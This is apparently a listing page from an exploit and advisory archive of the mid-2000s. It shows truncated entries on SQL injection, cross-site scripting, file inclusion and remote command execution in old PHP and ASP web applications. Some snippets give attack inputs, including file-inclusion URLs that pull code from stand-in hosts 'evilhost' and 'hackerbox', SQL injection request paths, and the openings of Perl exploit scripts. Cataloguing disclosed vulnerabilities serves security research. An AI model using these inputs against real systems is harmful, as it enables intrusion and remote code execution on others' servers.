Sire 2.0 Nws Remote File inclusion & Arbitary Files Upload

by Moroccan Security Team Geetz To All Freind +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code ? 73...

TotalECommerce 1.0 - index.asp?id SQL Injection

TotalECommerce 1.0 - index.asp?id SQL Injection Original advisory: http://www.nukedx.com/?viewdoc=18 Advisory by: nukedx Full PoC Explotation: GET - http://victim/dir/index.asp?secao=PageID&id=SQL EXAMPLE 1 -...

cubecartXSS.txt

CubeCart 3.0.7-pl1 multiple variable Cross site scripting Vendor url: www.cubecart.com bug report:http://bugs.cubecart.com/?do=details&id=459 Advisore:http://lostmon.blogspot.com/2006/01/ cubecart-307-pl1-indexphp-multiple.html. vendor notify:yes exploit avalable: yes I recomended to all vendors ...

INCOGEN Bugport 1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/16123/info Bugport is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in th...

CVE-2005-4838

Multiple cross-site scripting XSS vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 el/functions.jsp, 2 el/implicit-objects.jsp, and 3 jspx/textRotate.jspx in examples/jsp2/, as demonstrated via...

SimpleBBS 1.1 - Remote Command Execution (C)

SimpleBBS 1.1 - Remote Command Execution C / SimpleBBS !--total 188 drwxrwxrwx 2 f1 f1 4096 Dec 6 17:02 . drwxr-xr-x 7 f1 f1 4096 Nov 17 2002 .. -rw-r--r-- 1 f1 f1 916 Oct 20 09:30 WSFTP.LOG -rwxrwxrwx 1 f1 f1 28 Nov 17 2002 categories.php -rwxrwxrwx 1 f1 f1 151 Dec 7 09:11 forums.php -rwxrwxrwx ...

Top Music Module 3.0 - SQL Injection

Top Music Module 3.0 - SQL Injection source: https://www.securityfocus.com/bid/15581/info Top Music Module for PHP-Nuke is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query...

JBB SQL inj. vuln.

JBB SQL inj. vuln. Vuln. dicovered by : r0t Date: 28 nov. 2005 Orginal advisory:http://pridels.blogspot.com/2005/11/jbb-sql-inj-vuln.html Vendor:http://www.joelh.de/jbb/ affected version: jbb 0.9.9rc3 and prior Vuln. description: Input passed to the "nr" parameter in "topiczeigen.php", "forum"...

revizeSQL.txt

Revizer CMS SQL information disclosure and XSS Vendor url:http://www.idetix.com Advisore:http://lostmon.blogspot.com/2005/11/ revizer-cms-sql-information-disclosure.html Vendor notify: exploit available:yes The Revizer Web Content Management System enables non-technical content contributors to...

In W2K, elevated several attack instances of success or failure experiences-vulnerability and early warning-the black bar safety net

Speaking of the Virus are related to elevation of Privilege issues, the so-called elevation of privilege is the use of the system loopholes to obtain higher Privilege to. For example, you use the General user account to log on to Windows NT/Windows 2 0 0 0, You can only make a limited operation,...

MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit

No description provided by source. / ==================================================================================== || || || || || || || || || || ==================================================================================== Name: IIS 5.x and IIS 6.0 Server Name Spoof PoC File:...

Microsoft IIS 5.0 - 500-100.asp Server Name Spoof

Microsoft IIS 5.0 - 500-100.asp Server Name Spoof / ==================================================================================== || || || || || || || || || || ==================================================================================== Name: IIS 5.x and IIS 6.0 Server Name Spoof P...

phptbInject.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyñski VXSfx Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Top...

Full path disclosure in CaLogic 1.22 and possible in older versions.

Full path disclosure in CaLogic 1.22 and possible in older versions. Language: PHP Project name: CaLogic Risk: Low Home page: http://www.calogic.de Discovered by: GB & Zetha Explotation examples: http://target/calogic122/doclsqlres.php Fatal error: Call to a member function on a non-object in...

Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor

Exploit for unknown platform in category web applications ============================================================= Ultimate PHP Board = 1.9.6 GOLD users.dat Password Decryptor ============================================================= !/usr/bin/perl Passwords Decrypter for UPB = 1.9.6...

WebAPP 0.9.9.2.1 - Remote Command Execution (1)

WebAPP 0.9.9.2.1 - Remote Command Execution 1 !/usr/bin/perl T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m Remote C0mmand Executing Expl0it - For WebAPP CGI Exploit By : A l p h a P r o g r a m m e r Sirus-v ; E-Mail : [email protected] [email protected] This xpl Open a...

phpBBupload.txt

Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...

ZPanel &lt;= 2.5 Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

phpWebLog &lt;= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

PostNuke Phoenix 0.7x - &#039;SHOW&#039; SQL Injection

source: https://www.securityfocus.com/bid/12684/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that issue presents itself when malicious SQL syntax is issued to the application...